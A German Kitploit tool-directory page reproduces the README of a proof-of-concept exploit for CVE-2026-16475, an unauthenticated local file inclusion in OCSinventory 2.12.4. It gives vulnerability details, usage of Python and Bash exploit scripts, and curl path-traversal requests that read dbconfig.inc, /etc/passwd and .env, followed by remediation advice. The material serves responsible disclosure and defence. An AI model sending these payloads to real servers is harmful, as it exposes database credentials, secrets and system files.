Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-16475-PoC — Dies ist das offizielle Repository mit dem PoC der CVE-2026-16475, LFI in OCSinventory 2.12.4. | Kitploit
Tools/GitHubGitHub/afertar/cve-2026-16475-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

Dies ist das offizielle Repository mit dem PoC der CVE-2026-16475, LFI in OCSinventory 2.12.4.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-16475 - OCSinventory LFI PoC

Local-File-Inclusion-Schwachstelle in OCSinventory 2.12.4

Details zur Schwachstelle

CVE ID: CVE-2026-16475
CVSS-Score: 6.9 (Mittel)
CWE: CWE-98 (Unsachgemäße Kontrolle des Dateinamens für Include/Require-Anweisungen in PHP-Programmen)
Betroffene Version: OCSinventory 2.12.4
Status: In den neuesten Versionen gepatcht

Beschreibung

Im Endpunkt /ajax/teledeployoptions.php besteht eine Local-File-Inclusion-Schwachstelle (LFI), da der Parameter linkedoptions vor seiner Verwendung in einer dynamischen XML-Dateieinbindung nicht ordnungsgemäß bereinigt wird.

Der Endpunkt ist dafür ausgelegt, XML-Konfigurationsdateien zu laden, validiert den Parameter linkedoptions jedoch nicht ordnungsgemäß, was Pfad-Traversal-Angriffe ermöglicht.

Ein nicht authentifizierter Remote-Angreifer kann diese Schwachstelle ausnutzen, um:

  • Beliebige XML-Dateien im Anwendungsverzeichnis einzubinden und darauf zuzugreifen
  • Nicht-XML-Dateien über XML-Parser-Fehlermeldungen zu lesen
  • Vertrauliche Informationen über interne Anwendungsressourcen preiszugeben
  • Systemdateien aufzulisten und OS-Fingerprinting durchzuführen
  • Auswirkungen

    • Vertraulichkeit: HOCH - Zugriff auf beliebige Dateien (Konfigurationsdateien, Quellcode, Logs, Systemdateien)
    • Integrität: KEINE
    • Verfügbarkeit: KEINE
    • Erforderliche Authentifizierung: NEIN
    • Benutzerinteraktion: NEIN

    Verwendung

    Voraussetzungen

    root@kitploit:~
    pip install -r requirements.txt
    

    Python-Version (empfohlen)

    root@kitploit:~
    python3 exploit.py -u http://target.com -v
    

    Optionen:

    • -u, --url - Ziel-URL (erforderlich)
    • -v, --verbose - Ausführliche Ausgabe
    • -o, --output - Erfolgreiche Lesevorgänge in einer Datei speichern

    Beispiel:

    root@kitploit:~
    python3 exploit.py -u http://ocs.example.com -v -o results.txt
    

    Bash-Version

    root@kitploit:~
    ./lfi_test.sh
    

    Bearbeiten Sie die Variable BASE_URL im Skript:

    root@kitploit:~
    BASE_URL="http://target.com/ajax/teledeployoptions.php"
    

    Enumerierte Ziele

    • Anwendungskonfigurationsdateien (dbconfig.inc, .env, config.inc)
    • XML-Arbeitsdateien (bashscriptopt, executableopt, msiapplicationopt)
    • System-Logs (apache2, mysql, auth)
    • Systemdateien (/proc/, /etc/)
    • Anwendungsgeheimnisse (composer, Paketdateien, .htaccess)

    Ausnutzungsbeispiel

    root@kitploit:~
    # Read database config
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
    
    # Read passwd file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
    
    # Read environment file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
    

    Behebung

    Für Benutzer:

    • Aktualisieren Sie OCSinventory sofort auf die neueste Version
    • Implementieren Sie WAF-Regeln, um Pfad-Traversal-Muster zu blockieren

    Für Entwickler:

    • Verwenden Sie basename() oder ähnliche Funktionen, um Pfad-Traversal zu verhindern
    • Validieren und bereinigen Sie alle Benutzereingaben vor Dateioperationen
    • Implementieren Sie geeignete Zugriffskontrollen
    • Verwenden Sie Allow-Listen für gültige Dateipfade

    Referenzen

    • INCIBE Advisory (ES) - Offizielle CVE-Koordinierungsstelle
    • OCS Inventory GitHub
    • OWASP Path Traversal
    • CWE-98 Definition

    Hinweis: CVE-2026-16475 wird über INCIBE koordiniert und ist möglicherweise noch nicht im NVD indexiert. Ziehen Sie für maßgebliche Informationen die INCIBE-Quelle heran.

    Rechtliches

    Nur für Bildungszwecke und autorisierte Tests

    Den vollständigen rechtlichen Hinweis finden Sie in DISCLAIMER.md.

    Autor

    Adrián Ferrer Tarí


    Verantwortungsvolle Offenlegung, koordiniert über INCIBE

    Tool herunterladen